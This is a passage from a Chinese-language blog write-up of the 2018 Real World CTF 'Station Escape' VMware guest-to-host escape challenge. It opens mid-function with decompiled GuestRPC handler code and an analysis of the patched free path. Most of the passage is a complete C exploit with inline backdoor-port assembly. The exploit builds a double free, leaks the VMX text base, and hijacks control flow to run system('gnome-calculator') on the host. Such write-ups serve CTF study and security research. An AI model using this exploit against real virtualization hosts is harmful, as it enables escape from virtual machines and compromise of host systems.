                                                            v93);
    }
  }
  else
  {
    Errout((unsigned int)"GuestMsg: Unable to generate a cookie.\n", (_DWORD)cookie1, v81, v82, v83, v84);
  }
LABEL_17:
  ret_value(1, sub_command);                    // 返回ecx，即返回执行状态
  return 0LL;
}

漏洞点分析

    case 5:                                     // case 5：结束接受返回流程
      v3 = 7LL;
      channel51 = get_channel(6, 7);
      channel = channel51;
      if ( !channel51 )
        goto LABEL_62;
      LODWORD(cmd_buf_ptr) = channel51->state;
      if ( channel51->state == 4 )              // 只有全部接受完毕返回数据
                                                // 才可以进行如下流程
      {
        if ( LOBYTE(channel51->field_8) == 1 )
        {
LABEL_48:
          channel->state = 1;
          LOBYTE(channel->field_8) = 0;
          v3 = (unsigned __int64)sub_100000;
        }
        else if ( channel51->out_msg_buf )      // 输出缓冲区是否存在
        {
          v10 = (_BYTE *)(&dword_0 + 3);
          if ( (get_argument(3) & 1) != 0 )     // get ebx reply_type，&1 比较
          {
            v14 = (unsigned __int16)(0xAAAB * (((char *)channel - (char *)&channel_struct_list) >> 5));
          }
          else
          {
LABEL_80:
            v10 = "GuestMsg: Channel %u, Unable to send a message\n";
            v14 = (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5));
            v3 = (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5));
            Errout(
              (unsigned int)"GuestMsg: Channel %u, Unable to send a message\n",
              v3,
              v11,
              (char *)channel - (char *)&channel_struct_list,
              v12,
              v13);
          }
          channel->state = 1;
          channel->virtual_time = ((__int64 (__fastcall *)(const char *, unsigned __int64, __int64))VmTime_ReadVirtualTime)(
                                    v10,
                                    v3,
                                    v11);
          set_disactive(0, v14);	//patch了输出缓冲区指针置0
          finish_recv_func = (void (__fastcall *)(__int64, _QWORD, _QWORD))channel->finish_recv;
          reply_type = get_argument(3);
          finish_recv_func(channel->type_struct, v14, reply_type & 0x21);	//调用函数指针，&0x21
          LODWORD(v3) = 0x10000;
        }
        else
        {
LABEL_89:
          Errout(
            (unsigned int)"GuestMsg: Channel %u, Protocol error, out msg not present.\n",
            (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5)),
            cmd_buf_ptr,
            v5,
            v6,
            v7);
          LODWORD(v3) = 0;
        }
      }
      else
      {                                         // 未全部接收完毕，报错
LABEL_20:
        Errout(
          (unsigned int)"GuestMsg: Channel %u, Protocol error, state: %u\n",
          (unsigned __int16)(-21845 * (((char *)channel - (char *)&channel_struct_list) >> 5)),
          cmd_buf_ptr,
          v5,
          v6,
          v7);
        LODWORD(v3) = 0;
      }
LABEL_12:
      ret_value(1, v3);                         // 设置ecx，作为返回状态
      return 0LL;

增加了执行路径，导致可以在 case 5中执行 free(out_msg_buf)流程：

void __fastcall finish_recv(__int64 a1, unsigned __int16 a2, char reply_type1)
{
  void *v4; // rdi

  v4 = *(void **)(a1 + 8);
  if ( (reply_type1 & 0x20) != 0 )
  {
    free(v4);                                   // 释放输出缓冲区
  }
  else if ( (reply_type1 & 0x10) == 0 )
  {
    sub_176D90(a1, 0LL);
    if ( *(_BYTE *)(a1 + 32) )
    {
      Errout((__int64)"GuestRpc: Closing RPCI backdoor channel %u after send completion\n", a2);
      sub_189FE0(a2);
      *(_BYTE *)(a1 + 32) = 0;
    }
  }
}

漏洞利用

可以通过多次执行 case 5释放输出缓冲区，最后制造一个 double free的漏洞。然后利用 info-get和 info-set命令，实现堆块的分配。利用RPC的发送命令和接受返回来实现堆块布局：

#include <stdio.h>
#include <stdint.h>
#include <sched.h>
#include <unistd.h>
#include <sys/stat.h>
void channel_open(int *cookie1,int *cookie2,int *channel_num,int *res){
    asm("movl %%eax,%%ebx\n\t"
        "movq %%rdi,%%r10\n\t"
        "movq %%rsi,%%r11\n\t"
        "movq %%rdx,%%r12\n\t"
        "movq %%rcx,%%r13\n\t"
        "movl $0x564d5868,%%eax\n\t"
        "movl $0xc9435052,%%ebx\n\t"
        "movl $0x1e,%%ecx\n\t"
        "movl $0x5658,%%edx\n\t"
        "out %%eax,%%dx\n\t"
        "movl %%edi,(%%r10)\n\t"
        "movl %%esi,(%%r11)\n\t"
        "movl %%edx,(%%r12)\n\t"
        "movl %%ecx,(%%r13)\n\t"
        :
        :
        :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r8","%r10","%r11","%r12","%r13"
       );
}

void channel_set_len(int cookie1,int cookie2,int channel_num,int len,int *res){
    asm("movl %%eax,%%ebx\n\t"
        "movq %%r8,%%r10\n\t"
        "movl %%ecx,%%ebx\n\t"
        "movl $0x564d5868,%%eax\n\t"
        "movl $0x0001001e,%%ecx\n\t"
        "movw $0x5658,%%dx\n\t"
        "out %%eax,%%dx\n\t"
        "movl %%ecx,(%%r10)\n\t"
        :
        :
        :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10"
       );
}

void channel_send_data(int cookie1,int cookie2,int channel_num,int len,char *data,int *res){
    asm("pushq %%rbp\n\t"
        "movq %%r9,%%r10\n\t"
        "movq %%r8,%%rbp\n\t"
        "movq %%rcx,%%r11\n\t"
        "movq $0,%%r12\n\t"
        "1:\n\t"
        "movq %%r8,%%rbp\n\t"
        "add %%r12,%%rbp\n\t"
        "movl (%%rbp),%%ebx\n\t"
        "movl $0x564d5868,%%eax\n\t"
        "movl $0x0002001e,%%ecx\n\t"
        "movw $0x5658,%%dx\n\t"
        "out %%eax,%%dx\n\t"
        "addq $4,%%r12\n\t"
        "cmpq %%r12,%%r11\n\t"
        "ja 1b\n\t"
        "movl %%ecx,(%%r10)\n\t"
        "popq %%rbp\n\t"
        :
        :
        :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10","%r11","%r12"
        );
}

void channel_recv_reply_len(int cookie1,int cookie2,int channel_num,int *len,int *res){
    asm("movl %%eax,%%ebx\n\t"
        "movq %%r8,%%r10\n\t"
        "movq %%rcx,%%r11\n\t"
        "movl $0x564d5868,%%eax\n\t"
        "movl $0x0003001e,%%ecx\n\t"
        "movw $0x5658,%%dx\n\t"
        "out %%eax,%%dx\n\t"
        "movl %%ecx,(%%r10)\n\t"
        "movl %%ebx,(%%r11)\n\t"
        :
        :
        :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10","%r11"
       );

}

void channel_recv_data(int cookie1,int cookie2,int channel_num,int offset,char *data,int *res){
    asm("pushq %%rbp\n\t"
        "movq %%r9,%%r10\n\t"
        "movq %%r8,%%rbp\n\t"
        "movq %%rcx,%%r11\n\t"
        "movq $1,%%rbx\n\t"
        "movl $0x564d5868,%%eax\n\t"
        "movl $0x0004001e,%%ecx\n\t"
        "movw $0x5658,%%dx\n\t"
        "in %%dx,%%eax\n\t"
        "add %%r11,%%rbp\n\t"
        "movl %%ebx,(%%rbp)\n\t"
        "movl %%ecx,(%%r10)\n\t"
        "popq %%rbp\n\t"
        :
        :
        :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10","%r11","%r12"
       );
}

void channel_recv_finish(int cookie1,int cookie2,int channel_num,int *res){
    asm("movl %%eax,%%ebx\n\t"
        "movq %%rcx,%%r10\n\t"
        "movq $0x1,%%rbx\n\t"
        "movl $0x564d5868,%%eax\n\t"
        "movl $0x0005001e,%%ecx\n\t"
        "movw $0x5658,%%dx\n\t"
        "out %%eax,%%dx\n\t"
        "movl %%ecx,(%%r10)\n\t"
        :
        :
        :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10"
       );
}
void channel_recv_finish2(int cookie1,int cookie2,int channel_num,int *res){
    asm("movl %%eax,%%ebx\n\t"
        "movq %%rcx,%%r10\n\t"
        "movq $0x21,%%rbx\n\t"
        "movl $0x564d5868,%%eax\n\t"
        "movl $0x0005001e,%%ecx\n\t"
        "movw $0x5658,%%dx\n\t"
        "out %%eax,%%dx\n\t"
        "movl %%ecx,(%%r10)\n\t"
        :
        :
        :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10"
       );
}
void channel_close(int cookie1,int cookie2,int channel_num,int *res){
    asm("movl %%eax,%%ebx\n\t"
        "movq %%rcx,%%r10\n\t"
        "movl $0x564d5868,%%eax\n\t"
        "movl $0x0006001e,%%ecx\n\t"
        "movw $0x5658,%%dx\n\t"
        "out %%eax,%%dx\n\t"
        "movl %%ecx,(%%r10)\n\t"
        :
        :
        :"%rax","%rbx","%rcx","%rdx","%rsi","%rdi","%r10"
       );
}
struct channel{
    int cookie1;
    int cookie2;
    int num;
};
uint64_t heap =0;
uint64_t text =0;
void run_cmd(char *cmd){
    struct channel tmp;
    int res,len,i;
    char *data;
    channel_open(&tmp.cookie1,&tmp.cookie2,&tmp.num,&res);
    if(!res){
        printf("fail to open channel!\n");
        return;
    }
    channel_set_len(tmp.cookie1,tmp.cookie2,tmp.num,strlen(cmd),&res);
    if(!res){
        printf("fail to set len\n");
        return;
    }
    channel_send_data(tmp.cookie1,tmp.cookie2,tmp.num,strlen(cmd)+0x10,cmd,&res);

    channel_recv_reply_len(tmp.cookie1,tmp.cookie2,tmp.num,&len,&res);
    if(!res){
        printf("fail to recv data len\n");
        return;
    }
    printf("recv len:%d\n",len);
    data = malloc(len+0x10);
    memset(data,0,len+0x10);
    for(i=0;i<len+0x10;i+=4){
        channel_recv_data(tmp.cookie1,tmp.cookie2,tmp.num,i,data,&res);
    }
    printf("recv data:%s\n",data);
    channel_recv_finish(tmp.cookie1,tmp.cookie2,tmp.num,&res);
    if(!res){
        printf("fail to recv finish\n");
    }

    channel_close(tmp.cookie1,tmp.cookie2,tmp.num,&res);
    if(!res){
        printf("fail to close channel\n");
        return;
    }
}
void leak(){
    struct channel chan[10];
    int res=0;
    int len,i;	
    char pay[8192];
    char *s1 = "info-set guestinfo.a AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    char *data;
    char *s2 = "info-get guestinfo.a";
    char *s3 = "1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    char *s4 = "tools.capability.dnd_version 4";
    char *s5 = "vmx.capability.dnd_version";
    printf("Begin init data\n");
    getchar();
    //init data
    run_cmd(s1); // set the message len to be 0x100, so when we call info-get ,we will call malloc(0x100);
    run_cmd(s4);


    //first step 
    channel_open(&chan[0].cookie1,&chan[0].cookie2,&chan[0].num,&res);
    if(!res){
        printf("fail to open channel!\n");
        return;
    }
    channel_set_len(chan[0].cookie1,chan[0].cookie2,chan[0].num,strlen(s2),&res);
    if(!res){
        printf("fail to set len\n");
        return;
    }
    channel_send_data(chan[0].cookie1,chan[0].cookie2,chan[0].num,strlen(s2),s2,&res);
    channel_recv_reply_len(chan[0].cookie1,chan[0].cookie2,chan[0].num,&len,&res);
    if(!res){
        printf("fail to recv data len\n");
        return;
    }
    printf("recv len:%d\n",len);
    data = malloc(len+0x10);
    memset(data,0,len+0x10);
    for(i=0;i<len+0x10;i++){
        channel_recv_data(chan[0].cookie1,chan[0].cookie2,chan[0].num,i,data,&res);
    }
    printf("recv data:%s\n",data);
    //second step free the reply and let the other channel get it.

    channel_open(&chan[1].cookie1,&chan[1].cookie2,&chan[1].num,&res);
    if(!res){
        printf("fail to open channel!\n");
        return;
    }
    channel_set_len(chan[1].cookie1,chan[1].cookie2,chan[1].num,strlen(s2),&res);
    if(!res){
        printf("fail to set len\n");
        return;
    }

    channel_send_data(chan[1].cookie1,chan[1].cookie2,chan[1].num,strlen(s2)-4,s2,&res);
    if(!res){
        printf("fail to send data\n");
        return;
    }
    puts("free first channel output buffer");
    getchar();
    //free the output buffer
    printf("Freeing the buffer....,bp:0x5555556DD3EF\n");
    channel_recv_finish2(chan[0].cookie1,chan[0].cookie2,chan[0].num,&res);
    if(!res){
        printf("fail to recv finish1\n");
        return;
    }
    //finished sending the command, should get the freed buffer
    printf("Finishing sending the buffer , should allocate the buffer..,bp:0x5555556DD5BC\n");
    getchar();
    channel_send_data(chan[1].cookie1,chan[1].cookie2,chan[1].num,4,&s2[16],&res);
    if(!res){
        printf("fail to send data\n");
        return;
    }
    
    //third step,free it again
    //set status to be 4
    channel_recv_reply_len(chan[0].cookie1,chan[0].cookie2,chan[0].num,&len,&res);
    if(!res){
        printf("fail to recv data len\n");
        return;
    }
    printf("recv len:%d\n",len);

    //free the output buffer
    printf("Free the buffer again...\n");
    getchar();
    channel_recv_finish2(chan[0].cookie1,chan[0].cookie2,chan[0].num,&res);
    if(!res){
        printf("fail to recv finish2\n");
        return;
    }

    printf("Double free ok!Trying to reuse the buffer as a struct, which we can leak..\n");
    getchar();
    run_cmd(s5);
    printf("Should be done.Check the buffer\n");
    getchar();

    //Now the output buffer of chan[1] is used as a struct, which contains many addresses
    channel_recv_reply_len(chan[1].cookie1,chan[1].cookie2,chan[1].num,&len,&res);
    if(!res){
        printf("fail to recv data len\n");
        return;
    }


    data = malloc(len+0x10);
    memset(data,0,len+0x10);
    for(i=0;i<len+0x10;i+=4){
        channel_recv_data(chan[1].cookie1,chan[1].cookie2,chan[1].num,i,data,&res);
    }
    printf("recv data:\n");
    for(i=0;i<len;i+=8){
        printf("recv data:%lx\n",*(long long *)&data[i]);
    }
    text = (*(uint64_t *)data)-0xf818d0;

    printf("Leak Success\n");
}

void exploit(){
    //the exploit step is almost the same as the leak ones
    struct channel chan[10];
    int res=0;
    int len,i;
    char *data;
    char *s1 = "info-set guestinfo.b BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB";
    char *s2 = "info-get guestinfo.b";
    char *s3 = "1 BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB";
    char *s4 = "gnome-calculator\x00";
    uint64_t pay1 =text+0xFE95B8; 
    uint64_t pay2 =text+0xECFD0; //system
    uint64_t pay3 =text+0xFE95C8;
    char *pay4 = "gnome-calculator\x00";
    run_cmd(s1);
    channel_open(&chan[0].cookie1,&chan[0].cookie2,&chan[0].num,&res);
    if(!res){
        printf("fail to open channel!\n");
        return;
    }
    channel_set_len(chan[0].cookie1,chan[0].cookie2,chan[0].num,strlen(s2),&res);
    if(!res){
        printf("fail to set len\n");
        return;
    }
    channel_send_data(chan[0].cookie1,chan[0].cookie2,chan[0].num,strlen(s2),s2,&res);
    channel_recv_reply_len(chan[0].cookie1,chan[0].cookie2,chan[0].num,&len,&res);
    if(!res){
        printf("fail to recv data len\n");
        return;
    }
    printf("recv len:%d\n",len);
    data = malloc(len+0x10);
    memset(data,0,len+0x10);
    for(i=0;i<len+0x10;i+=4){
        channel_recv_data(chan[0].cookie1,chan[0].cookie2,chan[0].num,i,data,&res);
    }
    printf("recv data:%s\n",data);
    channel_open(&chan[1].cookie1,&chan[1].cookie2,&chan[1].num,&res);
    if(!res){
        printf("fail to open channel!\n");
        return;
    }
    channel_open(&chan[2].cookie1,&chan[2].cookie2,&chan[2].num,&res);
    if(!res){
        printf("fail to open channel!\n");
        return;
    }
    channel_open(&chan[3].cookie1,&chan[3].cookie2,&chan[3].num,&res);
    if(!res){
        printf("fail to open channel!\n");
        return;
    }
    channel_recv_finish2(chan[0].cookie1,chan[0].cookie2,chan[0].num,&res);
    if(!res){
        printf("fail to recv finish2\n");
        return;
    }
    channel_set_len(chan[1].cookie1,chan[1].cookie2,chan[1].num,strlen(s3),&res);
    if(!res){
        printf("fail to set len\n");
        return;
    }
    printf("leak2 success\n");
    channel_recv_reply_len(chan[0].cookie1,chan[0].cookie2,chan[0].num,&len,&res);
    if(!res){
        printf("fail to recv data len\n");
        return;
    }
    channel_recv_finish2(chan[0].cookie1,chan[0].cookie2,chan[0].num,&res);
    if(!res){
        printf("fail to recv finish2\n");
        return;
    }
    puts("hijack control flow");
    getchar();
    channel_send_data(chan[1].cookie1,chan[1].cookie2,chan[1].num,8,&pay1,&res);
    channel_set_len(chan[2].cookie1,chan[2].cookie2,chan[2].num,strlen(s3),&res);
    if(!res){
        printf("fail to set len\n");
        return;
    }
    channel_set_len(chan[3].cookie1,chan[3].cookie2,chan[3].num,strlen(s3),&res);
    channel_send_data(chan[3].cookie1,chan[3].cookie2,chan[3].num,8,&pay2,&res);
    channel_send_data(chan[3].cookie1,chan[3].cookie2,chan[3].num,8,&pay3,&res);
    channel_send_data(chan[3].cookie1,chan[3].cookie2,chan[3].num,strlen(pay4)+1,pay4,&res);
    run_cmd(s4);
    if(!res){
        printf("fail to set len\n");
        return;
    }
}
void main(){
    	// try to pin ourselves to the first cpu, so we don't have to deal w/ tcache woes
	cpu_set_t cset;
	CPU_ZERO(&cset);
	CPU_SET(0, &cset);
	printf("setaffinity: %d\n", sched_setaffinity(0, sizeof(cpu_set_t), &cset));

    setvbuf(stdout,0,2,0);
    setvbuf(stderr,0,2,0);
    setvbuf(stdin,0,2,0);
    leak();
    printf("text base :%p",text);
    exploit();
}

本文作者： A1ex
本文链接： http://yoursite.com/2021/05/28/2018-RealWorld-Station-Escape/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！